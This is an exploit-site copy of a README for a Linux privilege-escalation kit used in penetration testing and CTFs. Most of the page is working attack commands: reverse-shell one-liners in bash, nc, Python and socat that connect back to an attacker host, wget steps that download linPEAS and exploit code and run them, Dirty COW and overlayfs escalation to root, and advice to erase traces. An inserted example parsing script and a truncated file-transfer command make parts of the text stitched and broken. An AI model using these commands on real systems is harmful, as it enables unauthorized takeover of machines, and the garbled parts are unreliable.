## https://sploitus.com/exploit?id=01066642-42B4-57AB-A419-1FB04F7914B5
# ๐Ÿง linux-privesc-linpeas

> End-to-end Linux privilege escalation toolset, suitable for penetration testing, CTF challenges, and red team evaluations.

[![GitHub](https://img.shields.io/badge/GitHub-mcc0624%2Flinux--privesc--linpeas-blue)](https://github.com/mcc0624/linux-privesc-linpeas)
[![License](https://img.shields.io/badge/license-MIT-green)](LICENSE)
![Platform](https://img.shields.io/badge/platform-Linux-lightgrey)

---

## 📋 Overview

Automated Linux privilege escalation workflow, covering the entire chain from **receiving a reverse shell → information gathering → vulnerability analysis → exploit execution → successful privilege escalation**:

```
Target reverse shell
       ↓
  ┌─ Receiving the shell (6767) ──────────────────────┐
  │ socat / nc listening                              │
  └─────────────────────────┬─────────────────────────┘
                            ↓
  ┌─ Asset enumeration ───────────────────────────────┐
  │ linPEAS automatically uploaded and executed       │
  │ linux-exploit-suggester assisted verification     │
  └─────────────────────────┬─────────────────────────┘
                            ↓
  ┌─ Result analysis ─────────────────────────────────┐
  │ extracting CVEs, SUIDs, sudo commands, passwords  │
  │ matching exploits available for kernel versions   │
  └─────────────────────────┬─────────────────────────┘
                            ↓
  ┌─ CVE testing & privilege escalation ──────────────┐
  │ overlayfs (CVE-2015-1328)                         │
  │ Dirty COW (CVE-2016-5195)                         │
  │ more CVEs tested in priority order                │
  └─────────────────────────┬─────────────────────────┘
                            ↓
  ┌─ Delivery ────────────────────────────────────────┐
  │ root shell → specified listening port             │
  │ PoC code + usage instructions                     │
  └───────────────────────────────────────────────────┘
```

---

## 🚀 Quick Start

### Environment requirements (Local machine: Kali / attacker machine)

```bash
# Dependency check
which socat nc python3 curl wget tmux gcc 2>/dev/null || echo "Missing components need installation"

# Target machine: connect back to the listener on port 6767 (pick one of the following)

# Bash
bash -i >& /dev/tcp//6767 0>&1

# Netcat (with -e support)
nc -e /bin/bash 6767

# Netcat (without -e support)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 6767 >/tmp/f

# Python
python3 -c '
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 6767))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
'

# Socat
socat TCP::6767 EXEC:/bin/bash
```

### Step 2: Upload linPEAS

```bash
# Download and execute on the target machine
wget -q http://:8888/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
./linpeas.sh | tee /tmp/peas-out.txt
```

### Step 3: Obtain analysis results

```bash
# Method 1: Netcat transfer (recommended)
# On local machine:
nc -lvp 9996 > /tmp/target_peas.txt &
# On target machine:
nc 9996 9997/upload
```

### Step 4: Analyze results

```bash
# Use analysis script
python3 scripts/analyze_peas.py /tmp/target_peas.txt
```

Or manually follow these steps:

| 🔍 Key points | 🛠 Commands |
|---------------|-------------|
| Kernel version | `uname -a` |
| Distribution | `cat /etc/os-release` |
| CVE list | `grep -iE 'CVE-[0-9]{4}' /tmp/peas-out.txt` |
| SUID files | `find / -perm -4000 -type f 2>/dev/null` |
| sudo configuration | `sudo -l` |
| Cron tasks | `ls -la /etc/cron*` |
| Writable passwd / shadow | `ls -la /etc/passwd /etc/shadow` |
| Empty MySQL root password | `mysql -u root -e 'select version()'` |

### Step 5: Privilege Escalation

#### overlayfs (CVE-2015-1328): ⭐ Most stable

```bash
# Target machine
wget -q http://:8888/ofs.c -O /tmp/ofs.c
gcc /tmp/ofs.c -o /tmp/ofs
/tmp/ofs
id   # → uid=0(root) ✅
```

Applicable to: Ubuntu 12.04/14.04, kernel 3.13.0-3.19.0

#### Dirty COW (CVE-2016-5195): ⭐ Most versatile

```bash
# Target machine
wget -q http://:8888/dirtycow.c -O /tmp/dirty.c
gcc -pthread /tmp/dirty.c -o /tmp/dirty -lcrypt
/tmp/dirty mynewpass
su firefart  # Password: mynewpass
id   # → uid=0(root) ✅

# Clean up
cp /tmp/passwd.bak /etc/passwd
```

Applicable to: Kernel 2.6.22-4.8.3, almost all mainstream Linux distributions

### Step 6: Receiving a Root Shell

After gaining root, send a root shell back to a listener on the local machine:

```bash
# Local machine (another terminal):
nc -lvnp 8989

# Target machine (after privilege escalation):
bash -i >& /dev/tcp//8989 0>&1

# Or use the Python method:
python -c '
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 8989))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
'
```

---

## 🛠 Assistant Script Instructions

### `setup_listener.sh`: One-click deployment

```bash
chmod +x setup_listener.sh
./setup_listener.sh [Listener Port] [HTTP Port] [Reverse Shell Port]
# Default: 6767 8888 8989
```

Automated actions:
- Download linPEAS, exploit-suggester, CVE exploit source code
- Start tmux socat listening
- Start HTTP file service
- Print list of available files on the target machine

### `analyze_peas.py`: Automatic analysis

```bash
python3 analyze_peas.py /tmp/peas-output.txt
```

Extract information:
- Kernel version / Distribution
- All matching CVE IDs
- SUID/SGID files
- sudo permissions configuration
- Cron tasks
- Writable directories
- Sensitive information (passwords, keys, MySQL)
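As an added illustration of the kind of extraction the analysis step performs (example code written for this README, not the project's own `analyze_peas.py`), the following parses a constructed linPEAS-style excerpt, pulls out the kernel version, distribution, CVE IDs and SUID binaries, and flags which listed CVEs fall inside the kernel ranges stated above for overlayfs and Dirty COW. The sample text and the `KERNEL_RANGES` table are assumptions built from this page, not a real capture.

```python
import re

# Constructed linPEAS-style excerpt (not a real capture). ANSI colour codes are
# included because linPEAS keeps them when its output is piped through tee.
SAMPLE = (
    "\x1b[1;33m╔══════════╣ \x1b[1;32mBasic information\x1b[0m\n"
    "Linux version 3.13.0-24-generic (buildd@host) (gcc version 4.8.2)\n"
    'PRETTY_NAME="Ubuntu 14.04 LTS"\n'
    "╔══════════╣ Executing Linux Exploit Suggester\n"
    "[+] [CVE-2015-1328] overlayfs\n"
    "[+] [CVE-2016-5195] dirtycow\n"
    "[+] [CVE-2016-5195] dirtycow 2\n"
    "╔══════════╣ SUID - Check easy privesc\n"
    "-rwsr-xr-x 1 root root 40K Jan  1  2020 /usr/bin/sudo\n"
    "-rwsr-xr-x 1 root root 30K Jan  1  2020 /usr/bin/passwd\n"
    "-rwxr-xr-x 1 root root 10K Jan  1  2020 /usr/bin/id\n"
)

ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")
KERNEL_RE = re.compile(r"Linux version (\d+\.\d+\.\d+)")
DISTRO_RE = re.compile(r'PRETTY_NAME="([^"]+)"')
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
# ls -l style line whose owner execute bit is the setuid 's'; capture the path
SUID_RE = re.compile(r"^-[rwx-]{2}[sS]\S{6}.*\s(/\S+)$", re.M)

# Affected kernel ranges as stated in this README (inclusive); assumption used
# only to flag which listed CVEs plausibly apply to the observed kernel.
KERNEL_RANGES = {
    "CVE-2015-1328": ((3, 13, 0), (3, 19, 0)),
    "CVE-2016-5195": ((2, 6, 22), (4, 8, 3)),
}

def parse_version(s):
    """'3.13.0' -> (3, 13, 0) so versions compare as tuples, not strings."""
    return tuple(int(p) for p in s.split(".")[:3])

def analyze(text):
    text = ANSI_RE.sub("", text)                      # strip colour codes first
    kernel = KERNEL_RE.search(text)
    distro = DISTRO_RE.search(text)
    cves = list(dict.fromkeys(CVE_RE.findall(text)))  # dedupe, keep order
    suid = SUID_RE.findall(text)
    kv = parse_version(kernel.group(1)) if kernel else None
    in_range = [c for c in cves if c in KERNEL_RANGES and kv
                and KERNEL_RANGES[c][0] <= kv <= KERNEL_RANGES[c][1]]
    return {"kernel": kernel.group(1) if kernel else None,
            "distro": distro.group(1) if distro else None,
            "cves": cves, "suid": suid, "kernel_in_range": in_range}

if __name__ == "__main__":
    import json, sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    print(json.dumps(analyze(src), indent=2))
```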

### `recv_post.py`: File reception

```bash
python3 recv_post.py [Port] [Output Path]
# Default: 9997 /tmp/recv_file.txt
```

Automatically exits after receiving one POST request.

---

## โš ๏ธ Safety Notes

1. **This tool is only for legitimate, authorized testing.** Unauthorized use may violate laws.
2. **Back up important data.** Some exploits may cause system instability or data loss.
3. **Clean up traces.** After gaining privilege, clean up temporary files promptly (refer to the cleaning commands in `references/CVE_QUICK_REF.md`).
4. **Understand the consequences.** Ensure written authorization before using in a real production environment.

---

## 📚 Technical References

| Resource | Link |
|--------|--------|
| linPEAS / PEASS-ng | https://github.com/peass-ng/PEASS-ng |
| Linux Exploit Suggester | https://github.com/mzet-/linux-exploit-suggester |
| HackTricks Linux PrivEsc | https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html |
| Exploit Database | https://www.exploit-db.com |
| CVE-2015-1328 Details | https://nvd.nist.gov/vuln/detail/CVE-2015-1328 |
| CVE-2016-5195 Details | https://nvd.nist.gov/vuln/detail/CVE-2016-5195 |

---

## 📄 License

[MIT](LICENSE)

---

**Just landed a shell on a machine? The next step is to escalate privileges. This tool reduces the number of commands you need to type.**